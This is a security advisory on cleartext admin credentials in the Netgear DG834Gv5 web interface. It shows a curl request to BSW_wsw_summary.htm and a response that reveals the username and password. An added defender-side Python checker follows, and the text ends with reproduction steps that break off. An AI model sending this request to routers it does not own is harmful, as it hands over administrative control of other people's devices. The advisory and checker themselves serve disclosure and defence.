A security vulnerability has been identified in the Netgear DG834Gv5 router, where administrative credentials (username and password) are transmitted and displayed in plain text within the web management interface. This exposure can be exploited by an unauthorized attacker to gain administrative access to the device, affecting over 6,440 devices on the Internet.
Netgear DG834Gv5
Firmware Version: V6.00.25, V1.6.01.34
CWE-312 - Cleartext Storage of Sensitive Information
The following HTTP GET request demonstrates the retrieval of a webpage containing the administrative credentials in plain text:
curl "http://<router_ip>:<port>/BSW_wsw_summary.htm"
Response:
HTTP/1.0 200 OK
Content-length: 4042
Content-type: text/html
<html>
...
<tr>
<td width="50%"><b> Login Name</b></td>
<td width="50%">USERNAME</td>
</tr>
<tr>
<td width="50%"><b> Administrator Password:</b></td>
<td width="50%">PASSWORD</td>
</tr>
...
</html>
Notably, when another IP address is managing the device, the message "(ip_address) is managing this device" will appear.
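Added example, not part of the original advisory: a defender-side check that parses a saved copy of the BSW_wsw_summary.htm response from a device you administer and reports which credential rows carry a cleartext value, without echoing the value itself. The function and class names, the rule that a value made only of mask characters counts as masked, and the sample values are assumptions; only the row labels and the "is managing this device" message come from the text above.

```python
import re
from html.parser import HTMLParser

# Row labels taken from the response quoted above; everything else is assumed.
CREDENTIAL_LABELS = {"login name", "administrator password"}
BUSY_RE = re.compile(r"is managing this device", re.IGNORECASE)
MASK_CHARS = set("*\u2022")  # a value made only of these counts as masked

class CellCollector(HTMLParser):
    """Collect the whitespace-normalised text of every <td>, in order."""
    def __init__(self):
        super().__init__()
        self.cells, self._buf = [], None

    def handle_starttag(self, tag, attrs):
        if tag == "td":
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "td" and self._buf is not None:
            self.cells.append(" ".join("".join(self._buf).split()))
            self._buf = None

def audit_summary_page(body):
    """Report which credential rows carry a cleartext value, without echoing it."""
    parser = CellCollector()
    parser.feed(body)
    parser.close()
    exposed = []
    # Each label cell is followed directly by its value cell.
    for label, value in zip(parser.cells, parser.cells[1:]):
        key = label.rstrip(":").strip().lower()
        if key in CREDENTIAL_LABELS and value and not set(value) <= MASK_CHARS:
            exposed.append(key)
    return {"exposed": exposed, "managed_elsewhere": bool(BUSY_RE.search(body))}

# Constructed sample shaped like the quoted response; values are placeholders.
SAMPLE = """<html><table>
<tr><td width="50%"><b> Login Name</b></td><td width="50%">admin-example</td></tr>
<tr><td width="50%"><b> Administrator Password:</b></td><td width="50%">s3cret-example</td></tr>
</table></html>"""
MASKED = SAMPLE.replace("s3cret-example", "********")

if __name__ == "__main__":
    print(audit_summary_page(SAMPLE))
    print(audit_summary_page(MASKED))
```

A non-empty `exposed` list for a page served on the WAN side is the condition the advisory describes; `managed_elsewhere` only records that the session message was present in the capture.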
Firmware: V6.00.25
Get the username and password within BSW_wsw_summary.htm
Log in to the homepage: